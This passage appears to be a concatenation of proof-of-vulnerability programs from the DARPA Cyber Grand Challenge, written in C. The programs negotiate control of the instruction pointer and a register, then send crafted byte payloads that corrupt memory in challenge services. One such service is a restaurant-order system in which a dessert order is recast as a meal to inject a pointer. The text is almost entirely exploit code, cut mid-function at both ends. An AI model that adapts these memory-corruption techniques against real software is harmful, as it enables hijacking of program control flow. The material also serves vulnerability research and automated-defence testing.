"\x0b\x00\x00\x00\xe4\x1f\x1f\x1f\x07\x42\x41\x41\x01\x00\x00\x00" "\x0d\x00\x00\x00\xe5\x1f\x1f\x1f\x08\x42\x41\x41\x00\x00\x00\x00" "\x27\x00\x00\x00\xe6\x1f\x1f\x1f"; static unsigned int write_00001_00000_len = 3208; unsigned int *buf = (unsigned int *)write_00001_00000; unsigned int buf_idx = 1; // buf[0] is command bytes // unsigned int *buf = (unsigned int *)write_00001_00000; unsigned int r_count = buf[buf_idx++]; // buf[1] is rider count for (unsigned int i = 0; i < r_count; i++) { buf[buf_idx] = t1vals.regval++; // id = regval buf[buf_idx + 3] = t1vals.ipval++; // health_check = ipval buf_idx += 4; } transmit_all(1, write_00001_00000, write_00001_00000_len); free(buf); } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** length cgc_read read_00001_len = 4; read_00001 = (unsigned char*)malloc(read_00001_len); int read_00001_res = length_read(0, read_00001, read_00001_len); if (read_00001_res) {} //silence unused variable warning free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00002_00000[] = "\x10\x11\x12\x13\x10\x27\x00\x00"; static unsigned int write_00002_00000_len = 8; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** length cgc_read read_00002_len = 4; read_00002 = (unsigned char*)malloc(read_00002_len); int read_00002_res = length_read(0, read_00002, read_00002_len); if (read_00002_res) {} //silence unused variable warning free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00003_00000[] = "\x11\x22\x33\x11"; static unsigned int write_00003_00000_len = 4; unsigned char *write_00003 = NULL; unsigned int write_00003_len = 0; write_00003 = append_buf(write_00003, &write_00003_len, write_00003_00000, write_00003_00000_len); if (write_00003_len > 0) { transmit_all(1, write_00003, write_00003_len); } free(write_00003); } while (0); do { unsigned char *read_00003; unsigned int read_00003_len; unsigned int read_00003_ptr = 0; //**** length cgc_read read_00003_len = 4; read_00003 = (unsigned char*)malloc(read_00003_len); int read_00003_res = length_read(0, read_00003, read_00003_len); if (read_00003_res) {} //silence unused variable warning free(read_00003); if (read_00003_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00004_00000[] = "\x10\x11\x12\x13\x10\x27\x00\x00"; static unsigned int write_00004_00000_len = 8; unsigned char *write_00004 = NULL; unsigned int write_00004_len = 0; write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len); if (write_00004_len > 0) { transmit_all(1, write_00004, write_00004_len); } free(write_00004); } while (0); do { unsigned char *read_00004; unsigned int read_00004_len; unsigned int read_00004_ptr = 0; //**** length cgc_read read_00004_len = 4; read_00004 = (unsigned char*)malloc(read_00004_len); int read_00004_res = length_read(0, read_00004, read_00004_len); if (read_00004_res) {} //silence unused variable warning free(read_00004); if (read_00004_ptr) {} //silence unused variable warning if any } while (0); }
int main(void) { type1_vals vals; type1_negotiate(0x00fffff, 0x00fffff, 1, &vals); //*** delay delay(100); do { //*** writing data static unsigned char write_00000_00000[] = "\x73\x0a"; static unsigned int write_00000_00000_len = 2; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\x64\x0a"; static unsigned int write_00001_00000_len = 2; unsigned char *write_00001 = NULL; unsigned int write_00001_len = 0; write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len); if (write_00001_len > 0) { transmit_all(1, write_00001, write_00001_len); } free(write_00001); } while (0); do { //*** writing data static unsigned char write_00002_00000[] = "\x31\x30\x2e\x30\x0a"; static unsigned int write_00002_00000_len = 5; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { //*** writing data static unsigned char write_00003_00000[] = "\x61\x0a"; static unsigned int write_00003_00000_len = 2; unsigned char *write_00003 = NULL; unsigned int write_00003_len = 0; write_00003 = append_buf(write_00003, &write_00003_len, write_00003_00000, write_00003_00000_len); if (write_00003_len > 0) { transmit_all(1, write_00003, write_00003_len); } free(write_00003); } while (0); do { //*** writing data static unsigned char write_00004_00000[] = "\x70\x0a"; static unsigned int write_00004_00000_len = 2; unsigned char *write_00004 = NULL; unsigned int write_00004_len = 0; write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len); if (write_00004_len > 0) { transmit_all(1, write_00004, write_00004_len); } free(write_00004); } while (0); do { //*** writing data static unsigned char write_00005_00000[] = "\x64\x0a"; static unsigned int write_00005_00000_len = 2; unsigned char *write_00005 = NULL; unsigned int write_00005_len = 0; write_00005 = append_buf(write_00005, &write_00005_len, write_00005_00000, write_00005_00000_len); if (write_00005_len > 0) { transmit_all(1, write_00005, write_00005_len); } free(write_00005); } while (0); do { //*** writing data static unsigned char write_00006_00000[] = "\x2c"; static unsigned int write_00006_00000_len = 1; static unsigned char write_00006_00003[] = "\x2c\x30\x0a"; static unsigned int write_00006_00003_len = 3; unsigned char *write_00006 = NULL; unsigned int write_00006_len = 0; char dtostr_buf[256]; union { double d; struct { unsigned int lo, hi; } u; } pack; pack.u.hi = 0x41800000; pack.u.lo = vals.regval; dtostr(pack.d, dtostr_buf, sizeof(dtostr_buf)); write_00006 = append_buf(write_00006, &write_00006_len, (unsigned char *)dtostr_buf, cgc_strlen(dtostr_buf)); write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len); pack.u.lo = vals.ipval; dtostr(pack.d, dtostr_buf, sizeof(dtostr_buf)); write_00006 = append_buf(write_00006, &write_00006_len, (unsigned char *)dtostr_buf, cgc_strlen(dtostr_buf)); write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00003, write_00006_00003_len); if (write_00006_len > 0) { transmit_all(1, write_00006, write_00006_len); } free(write_00006); } while (0); do { //*** writing data static unsigned char write_00007_00000[] = "\x30\x2c\x30\x2c\x30\x0a"; static unsigned int write_00007_00000_len = 6; unsigned char *write_00007 = NULL; unsigned int write_00007_len = 0; write_00007 = append_buf(write_00007, &write_00007_len, write_00007_00000, write_00007_00000_len); if (write_00007_len > 0) { transmit_all(1, write_00007, write_00007_len); } free(write_00007); } while (0); do { //*** writing data static unsigned char write_00008_00000[] = "\x31\x2c\x31\x2c\x31\x0a"; static unsigned int write_00008_00000_len = 6; unsigned char *write_00008 = NULL; unsigned int write_00008_len = 0; write_00008 = append_buf(write_00008, &write_00008_len, write_00008_00000, write_00008_00000_len); if (write_00008_len > 0) { transmit_all(1, write_00008, write_00008_len); } free(write_00008); } while (0); do { //*** writing data static unsigned char write_00009_00000[] = "\x30\x2c\x30\x2c\x30\x0a"; static unsigned int write_00009_00000_len = 6; unsigned char *write_00009 = NULL; unsigned int write_00009_len = 0; write_00009 = append_buf(write_00009, &write_00009_len, write_00009_00000, write_00009_00000_len); if (write_00009_len > 0) { transmit_all(1, write_00009, write_00009_len); } free(write_00009); } while (0); do { //*** writing data static unsigned char write_00010_00000[] = "\x72\x0a"; static unsigned int write_00010_00000_len = 2; unsigned char *write_00010 = NULL; unsigned int write_00010_len = 0; write_00010 = append_buf(write_00010, &write_00010_len, write_00010_00000, write_00010_00000_len); if (write_00010_len > 0) { transmit_all(1, write_00010, write_00010_len); } free(write_00010); } while (0); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** delimited cgc_read static unsigned char read_00000_delim[] = "\x0a"; read_00000 = NULL; read_00000_len = 0; int read_00000_res = delimited_read(0, &read_00000, &read_00000_len, read_00000_delim, 1); if (read_00000_res) {} //silence unused variable warning free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** delimited cgc_read static unsigned char read_00001_delim[] = "\x0a"; read_00001 = NULL; read_00001_len = 0; int read_00001_res = delimited_read(0, &read_00001, &read_00001_len, read_00001_delim, 1); if (read_00001_res) {} //silence unused variable warning free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** delimited cgc_read static unsigned char read_00002_delim[] = "\x0a"; read_00002 = NULL; read_00002_len = 0; int read_00002_res = delimited_read(0, &read_00002, &read_00002_len, read_00002_delim, 1); if (read_00002_res) {} //silence unused variable warning free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); delay(100); do { //*** writing data static unsigned char write_00011_00000[] = "\x71\x0a"; static unsigned int write_00011_00000_len = 2; unsigned char *write_00011 = NULL; unsigned int write_00011_len = 0; write_00011 = append_buf(write_00011, &write_00011_len, write_00011_00000, write_00011_00000_len); if (write_00011_len > 0) { transmit_all(1, write_00011, write_00011_len); } free(write_00011); } while (0); }
int main(void) { unsigned int reg, ip; type1_vals t1vals; type1_negotiate(0x0fffff80, 0xffffff80, 2, &t1vals); reg = t1vals.regval; // c_id ip = t1vals.ipval|0xf0000000; // make sure it's in kernel space // bytes 25-28 in a MEAL unsigned char ok_buf[2] = {0}; unsigned char seated = 0; unsigned char c_count = CUSTOMER_COUNT; /* add_customer send add_customer cmd send CUSTOMER_COUNT generate and send CUSTOMER_COUNT customer ids (c_ids) recv # of seated customers recv STATUS_OK */ SEND_CMD(CMD_ADD_CUST); SEND_UCHAR(&c_count); for (int i = 0; i < CUSTOMER_COUNT; i++) { SEND_UINT(®); reg++; } RECV_UCHAR(&seated); RECV_OK(ok_buf); Order *o_list = NULL; Order *o = NULL; unsigned char o_count = 0; unsigned int ids[2] = {0}; Appetizer *app = NULL; Meal *meal = NULL; Dessert *des = NULL; /* app get_orders send get_orders cmd recv # of orders recv orders recv STATUS_OK */ SEND_CMD(CMD_GET_ORDERS); RECV_UCHAR(&o_count); for (unsigned int i = 0; i < o_count; i++) { o = malloc(sizeof(Order)); if (!o) return -1; RECV_IDS(ids); o->t_id = ids[0]; o->c_id = ids[1]; app = malloc(sizeof(Appetizer)); if (!app) return -1; RECV_FOOD(app, sizeof(Appetizer) - sizeof(void *)); o->item = app; o->ftype = app->ftype; append_order_to_list(&o_list, o); } RECV_OK(ok_buf); /* app order_up send order_up cmd send # of orders send orders recv STATUS_OK */ SEND_CMD(CMD_ORDER_UP); SEND_UCHAR(&o_count); o = pop_order_from_list(&o_list); while (o) { ids[0] = o->t_id; ids[1] = o->c_id; SEND_IDS(ids); SEND_UINT(&o->ftype); app = o->item; SEND_FOOD(app->name, APP_NAME_SZ); free(o->item); free(o); o = pop_order_from_list(&o_list); } RECV_OK(ok_buf); /* meal get_orders send get_orders cmd recv # of orders recv orders recv STATUS_OK */ SEND_CMD(CMD_GET_ORDERS); RECV_UCHAR(&o_count); for (unsigned int i = 0; i < o_count; i++) { o = malloc(sizeof(Order)); if (!o) return -1; RECV_IDS(ids); o->t_id = ids[0]; o->c_id = ids[1]; meal = malloc(sizeof(Meal)); if (!meal) return -1; RECV_FOOD(meal, sizeof(Meal) - sizeof(void *)); o->item = meal; o->ftype = meal->ftype; append_order_to_list(&o_list, o); } RECV_OK(ok_buf); /* meal order_up send order_up cmd send # of orders send orders recv STATUS_OK */ SEND_CMD(CMD_ORDER_UP); SEND_UCHAR(&o_count); o = pop_order_from_list(&o_list); while (o) { ids[0] = o->t_id; ids[1] = o->c_id; SEND_IDS(ids); SEND_UINT(&o->ftype); meal = o->item; SEND_FOOD(meal->name, MEAL_NAME_SZ + MEAL_MAIN_SZ + MEAL_VEG_SZ + MEAL_SIDE_SZ); free(o->item); free(o); o = pop_order_from_list(&o_list); } RECV_OK(ok_buf); /* des get_orders send get_orders cmd recv # of orders recv orders recv STATUS_OK */ SEND_CMD(CMD_GET_ORDERS); RECV_UCHAR(&o_count); for (unsigned int i = 0; i < o_count; i++) { o = malloc(sizeof(Order)); if (!o) return -1; RECV_IDS(ids); o->t_id = ids[0]; o->c_id = ids[1]; des = malloc(sizeof(Dessert)); if (!des) return -1; RECV_FOOD(des, sizeof(Dessert) - sizeof(void *)); o->item = des; o->ftype = des->ftype; append_order_to_list(&o_list, o); } RECV_OK(ok_buf); /* des order_up send order_up cmd send # of orders send orders (MOD orders for TARGET_TABLE_ID to be MEALs) send 24 bytes send 4 byte ip send 52 bytes recv STATUS_OK */ SEND_CMD(CMD_ORDER_UP); SEND_UCHAR(&o_count); o = pop_order_from_list(&o_list); while (o) { ids[0] = o->t_id; ids[1] = o->c_id; SEND_IDS(ids); if (TARGET_TABLE_ID == o->t_id) { // POV o->ftype = MEAL_TYPE; SEND_UINT(&o->ftype); meal = o->item; SEND_FOOD(&FOOD[TARGET_TABLE_ID], 24); SEND_UINT(&ip); ip++; SEND_FOOD(&FOOD[TARGET_TABLE_ID], 52); } else { // not POV SEND_UINT(&o->ftype); des = o->item; SEND_FOOD(des->name, DES_NAME_SZ); } free(o->item); free(o); o = pop_order_from_list(&o_list); } RECV_OK(ok_buf); /* quit */ SEND_CMD(CMD_QUIT); RECV_OK(ok_buf); return 0; }
int main(void) { type1_vals t1vals; type1_negotiate(0xedededed, 0xededede5, 6, &t1vals); // ESI == 6, last byte is going to be off by 8 unsigned int no_ed = 0x12121212; // have to prevent 0xed from each byte of EIP and REG do { //*** writing data static unsigned char write_00000_00000[] = "\x04\xd4\x7e\x00"; static unsigned int write_00000_00000_len = 4; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\x31\x33\x30\x30\x31\x33\x38\x38"; static unsigned int write_00001_00000_len = 8; unsigned char *write_00001 = NULL; unsigned int write_00001_len = 0; write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len); if (write_00001_len > 0) { transmit_all(1, write_00001, write_00001_len); } free(write_00001); } while (0); do { //*** writing data static unsigned char write_00002_00000[] = "\x0f\x44\x00\x00\xcd\xcc\x3c\x40\x75\x4d\x68\x49\x65\x4e\x46\x51" "\x5a\x4b\x69\x7a\x62\x57\x6d\x41\x66\x53\x48\x70\x52\x62\x49\x56" "\x57\x4e\x56\x43\x66\x70\x51\x5a\x4c\x78\x6b\x7a\x4f\x7a\x61\x65" "\x77\x64\x56\x56\x54\x78\x43\x56\x6f\x62\x42\x51\x50\x66\x47\x76" "\x75\x64\x45\x51\x74\x4b\x6c\x72\x50\x67\x79\x59\x64\x56\x52\x4d" "\x6c\x50\x55\x57\x58\x41\x57\x4a\x62\x42\x69\x47\x41\x52\x55\x59" "\x77\x77\x59\x54\x58\x44\x43\x55\x42\x7a\x47\x76\x63\x6b\x6f\x52" "\x70\x5a\x69\x6b\x6b\x79\x71\x77\x6b\x67\x61\x66\x58\x6d\x61\x50" "\x56\x74\x52\x47\x45\x54\x62\x63\x41\x42\x43\x44\x45\x46\x47\x48"; static unsigned int write_00002_00000_len = 144; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { // # &desc_copy (EIP) -> JKLM //*** writing data unsigned int eip = t1vals.ipval | no_ed; unsigned char *write_00003 = NULL; unsigned int write_00003_len = 0; write_00003 = append_buf(write_00003, &write_00003_len, (unsigned char*)&eip, 4); if (write_00003_len > 0) { transmit_all(1, write_00003, write_00003_len); } free(write_00003); } while (0); do { // # &p (ESI) -> (N+8)OPQ //*** writing data unsigned int reg = t1vals.regval | no_ed; unsigned char *write_00004 = NULL; unsigned int write_00004_len = 0; write_00004 = append_buf(write_00004, &write_00004_len, (unsigned char*)®, 4); if (write_00004_len > 0) { transmit_all(1, write_00004, write_00004_len); } free(write_00004); } while (0); do { //*** writing data static unsigned char write_00005_00000[] = "\xed"; static unsigned int write_00005_00000_len = 1; unsigned char *write_00005 = NULL; unsigned int write_00005_len = 0; write_00005 = append_buf(write_00005, &write_00005_len, write_00005_00000, write_00005_00000_len); if (write_00005_len > 0) { transmit_all(1, write_00005, write_00005_len); } free(write_00005); } while (0); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** length cgc_read read_00000_len = 2; read_00000 = (unsigned char*)malloc(read_00000_len); int read_00000_res = length_read(0, read_00000, read_00000_len); if (read_00000_res) {} //silence unused variable warning free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00006_00000[] = "\xc4\xec\x4e\xee"; static unsigned int write_00006_00000_len = 4; unsigned char *write_00006 = NULL; unsigned int write_00006_len = 0; write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len); if (write_00006_len > 0) { transmit_all(1, write_00006, write_00006_len); } free(write_00006); } while (0); do { //*** writing data static unsigned char write_00007_00000[] = "\x31\x33\x30\x30\x31\x33\x38\x38"; static unsigned int write_00007_00000_len = 8; unsigned char *write_00007 = NULL; unsigned int write_00007_len = 0; write_00007 = append_buf(write_00007, &write_00007_len, write_00007_00000, write_00007_00000_len); if (write_00007_len > 0) { transmit_all(1, write_00007, write_00007_len); } free(write_00007); } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** length cgc_read read_00001_len = 4; read_00001 = (unsigned char*)malloc(read_00001_len); int read_00001_res = length_read(0, read_00001, read_00001_len); if (read_00001_res) {} //silence unused variable warning free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** length cgc_read read_00002_len = 4; read_00002 = (unsigned char*)malloc(read_00002_len); int read_00002_res = length_read(0, read_00002, read_00002_len); if (read_00002_res) {} //silence unused variable warning free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00003; unsigned int read_00003_len; unsigned int read_00003_ptr = 0; //**** length cgc_read read_00003_len = 145; read_00003 = (unsigned char*)malloc(read_00003_len); int read_00003_res = length_read(0, read_00003, read_00003_len); if (read_00003_res) {} //silence unused variable warning //**** cgc_read match data static unsigned char match_00003_00000[] = "\x75\x4d\x68\x49\x65\x4e\x46\x51\x5a\x4b\x69\x7a\x62\x57\x6d\x41" "\x66\x53\x48\x70\x52\x62\x49\x56\x57\x4e\x56\x43\x66\x70\x51\x5a" "\x4c\x78\x6b\x7a\x4f\x7a\x61\x65\x77\x64\x56\x56\x54\x78\x43\x56" "\x6f\x62\x42\x51\x50\x66\x47\x76\x75\x64\x45\x51\x74\x4b\x6c\x72" "\x50\x67\x79\x59\x64\x56\x52\x4d\x6c\x50\x55\x57\x58\x41\x57\x4a" "\x62\x42\x69\x47\x41\x52\x55\x59\x77\x77\x59\x54\x58\x44\x43\x55" "\x42\x7a\x47\x76\x63\x6b\x6f\x52\x70\x5a\x69\x6b\x6b\x79\x71\x77" "\x6b\x67\x61\x66\x58\x6d\x61\x50\x56\x74\x52\x47\x45\x54\x62\x63" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\xed"; read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 145); free(read_00003); if (read_00003_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00004; unsigned int read_00004_len; unsigned int read_00004_ptr = 0; //**** length cgc_read read_00004_len = 2; read_00004 = (unsigned char*)malloc(read_00004_len); int read_00004_res = length_read(0, read_00004, read_00004_len); if (read_00004_res) {} //silence unused variable warning free(read_00004); if (read_00004_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00008_00000[] = "\xff\xff\xff\xff"; static unsigned int write_00008_00000_len = 4; unsigned char *write_00008 = NULL; unsigned int write_00008_len = 0; write_00008 = append_buf(write_00008, &write_00008_len, write_00008_00000, write_00008_00000_len); if (write_00008_len > 0) { transmit_all(1, write_00008, write_00008_len); } free(write_00008); } while (0); do { unsigned char *read_00005; unsigned int read_00005_len; unsigned int read_00005_ptr = 0; //**** length cgc_read read_00005_len = 2; read_00005 = (unsigned char*)malloc(read_00005_len); int read_00005_res = length_read(0, read_00005, read_00005_len); if (read_00005_res) {} //silence unused variable warning free(read_00005); if (read_00005_ptr) {} //silence unused variable warning if any } while (0); }
int main(void) { type1_vals t1vals = { 0 }; uint32_t mask_eip, mask_reg; mask_eip = 0x0FFFFFFF; mask_reg = 0x0FFFFFFF; type1_negotiate(mask_eip, mask_reg, 2, &t1vals); t1vals.ipval |= 0xF0000000; // make sure out of range of valid fn ptrs t1vals.regval |= 0xF0000000; // make sure out of range of valid fn ptrs // parent2 regval // parent3 ipval unsigned int p2_val = t1vals.regval; unsigned int p3_val = t1vals.ipval; do { //*** writing data (child) static unsigned char write_00000_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x1f\xbc\x00\x00\x00\x4d\x66\x59" "\x55\x54\x78\x58\x53\x6e\x49\x53\x70\x54\x58\x43\x75\x65\x79\x6a" "\x7a\x50\x47\x63\x52\x59\x6c\x6e\x61\x70\x63\x76"; static unsigned int write_00000_00000_len = 44; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** length read read_00000_len = 4; read_00000 = (unsigned char*)malloc(read_00000_len); int read_00000_res = length_read(0, read_00000, read_00000_len); if (read_00000_res) {} //silence unused variable warning free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x2e\xa5\x00\x00\x34\x1f\x4c\x57" "\x68\x6e\x42\x69\x58\x73\x51\x66\x4e\x4c\x74\x65\x44\x42\x54\x67" "\x76\x57\x4b\x74\x75\x46\x44\x49\x4c\x57\x4b\x73"; static unsigned int write_00001_00000_len = 44; unsigned char *write_00001 = NULL; unsigned int write_00001_len = 0; write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len); if (write_00001_len > 0) { transmit_all(1, write_00001, write_00001_len); } free(write_00001); } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** length read read_00001_len = 4; read_00001 = (unsigned char*)malloc(read_00001_len); int read_00001_res = length_read(0, read_00001, read_00001_len); if (read_00001_res) {} //silence unused variable warning free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data (parent1) static unsigned char write_00002_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\xd8\xc0\x00\x00\x75\x6a\x6d\x53" "\x4d\x68\x53\x69\x58\x71\x61\x63\x55\x5a\x6b\x44\x4d\x43\x65\x41" "\x50\x4f\x5a\x75\x4b\x56\x4a\x63\x77\x48\x6d\x47"; static unsigned int write_00002_00000_len = 44; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** length read read_00002_len = 4; read_00002 = (unsigned char*)malloc(read_00002_len); int read_00002_res = length_read(0, read_00002, read_00002_len); if (read_00002_res) {} //silence unused variable warning free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00003_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x29\x66\x00\x00\x99\x7a\x73\x75" "\x75\x65\x6e\x49\x51\x4d\x6a\x73\x47\x48\x57\x76\x4f\x4c\x43\x64" "\x72\x42\x41\x4d\x6b\x6e\x7a\x75\x6c\x4f\x52\x5a"; static unsigned int write_00003_00000_len = 44; unsigned char *write_00003 = NULL; unsigned int write_00003_len = 0; write_00003 = append_buf(write_00003, &write_00003_len, write_00003_00000, write_00003_00000_len); if (write_00003_len > 0) { transmit_all(1, write_00003, write_00003_len); } free(write_00003); } while (0); do { unsigned char *read_00003; unsigned int read_00003_len; unsigned int read_00003_ptr = 0; //**** length read read_00003_len = 4; read_00003 = (unsigned char*)malloc(read_00003_len); int read_00003_res = length_read(0, read_00003, read_00003_len); if (read_00003_res) {} //silence unused variable warning free(read_00003); if (read_00003_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00004_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x73\xd3\x00\x00\x90\x1d\x54\x68" "\x44\x4d\x70\x55\x4b\x74\x4c\x43\x72\x4e\x76\x4e\x79\x4f\x7a\x72" "\x4b\x64\x49\x65\x59\x55\x61\x46\x4c\x50\x52\x45"; static unsigned int write_00004_00000_len = 44; unsigned char *write_00004 = NULL; unsigned int write_00004_len = 0; write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len); if (write_00004_len > 0) { transmit_all(1, write_00004, write_00004_len); } free(write_00004); } while (0); do { unsigned char *read_00004; unsigned int read_00004_len; unsigned int read_00004_ptr = 0; //**** length read read_00004_len = 4; read_00004 = (unsigned char*)malloc(read_00004_len); int read_00004_res = length_read(0, read_00004, read_00004_len); if (read_00004_res) {} //silence unused variable warning free(read_00004); if (read_00004_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data (parent2) static unsigned char write_00005_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x6c\x13\x00\x00\xc6\x5d\x50\x51" "\x66\x47\x50\x57\x79\x78\x6e\x54\x75\x77\x5a\x64\x4f\x66\x70\x72" "\x48\x67\x70\x72\x79\x6b\x75\x50\x6c\x63\x6b\x50"; static unsigned int write_00005_00000_len = 44; unsigned int *buf = (unsigned int *)write_00005_00000; buf[2] = p2_val; unsigned char *write_00005 = NULL; unsigned int write_00005_len = 0; write_00005 = append_buf(write_00005, &write_00005_len, write_00005_00000, write_00005_00000_len); if (write_00005_len > 0) { transmit_all(1, write_00005, write_00005_len); } free(write_00005); } while (0); do { unsigned char *read_00005; unsigned int read_00005_len; unsigned int read_00005_ptr = 0; //**** length read read_00005_len = 4; read_00005 = (unsigned char*)malloc(read_00005_len); int read_00005_res = length_read(0, read_00005, read_00005_len); if (read_00005_res) {} //silence unused variable warning free(read_00005); if (read_00005_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00006_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x6e\xc5\x00\x00\x72\xc5\x42\x6d" "\x4e\x49\x6e\x54\x51\x6c\x75\x44\x5a\x6c\x57\x43\x71\x6f\x4a\x6f" "\x61\x4c\x49\x51\x66\x4d\x75\x47\x6b\x43\x55\x63"; static unsigned int write_00006_00000_len = 44; unsigned char *write_00006 = NULL; unsigned int write_00006_len = 0; write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len); if (write_00006_len > 0) { transmit_all(1, write_00006, write_00006_len); } free(write_00006); } while (0); do { unsigned char *read_00006; unsigned int read_00006_len; unsigned int read_00006_ptr = 0; //**** length read read_00006_len = 4; read_00006 = (unsigned char*)malloc(read_00006_len); int read_00006_res = length_read(0, read_00006, read_00006_len); if (read_00006_res) {} //silence unused variable warning free(read_00006); if (read_00006_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00007_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x3e\xc0\x00\x00\x51\xb2\x70\x79" "\x44\x59\x77\x67\x67\x57\x48\x65\x53\x4f\x76\x55\x77\x61\x65\x75" "\x68\x6b\x71\x71\x61\x52\x4b\x48\x55\x63\x6d\x52"; static unsigned int write_00007_00000_len = 44; unsigned char *write_00007 = NULL; unsigned int write_00007_len = 0; write_00007 = append_buf(write_00007, &write_00007_len, write_00007_00000, write_00007_00000_len); if (write_00007_len > 0) { transmit_all(1, write_00007, write_00007_len); } free(write_00007); } while (0); do { unsigned char *read_00007; unsigned int read_00007_len; unsigned int read_00007_ptr = 0; //**** length read read_00007_len = 4; read_00007 = (unsigned char*)malloc(read_00007_len); int read_00007_res = length_read(0, read_00007, read_00007_len); if (read_00007_res) {} //silence unused variable warning free(read_00007); if (read_00007_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data (parent3) static unsigned char write_00008_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x82\x24\x00\x00\xa9\x7c\x70\x41" "\x4e\x45\x62\x78\x44\x6b\x64\x4d\x46\x47\x76\x6f\x51\x4a\x51\x68" "\x76\x4d\x6d\x5a\x57\x5a\x73\x6e\x77\x57\x71\x61"; static unsigned int write_00008_00000_len = 44; unsigned int *buf = (unsigned int *)write_00008_00000; buf[2] = p3_val; unsigned char *write_00008 = NULL; unsigned int write_00008_len = 0; write_00008 = append_buf(write_00008, &write_00008_len, write_00008_00000, write_00008_00000_len); if 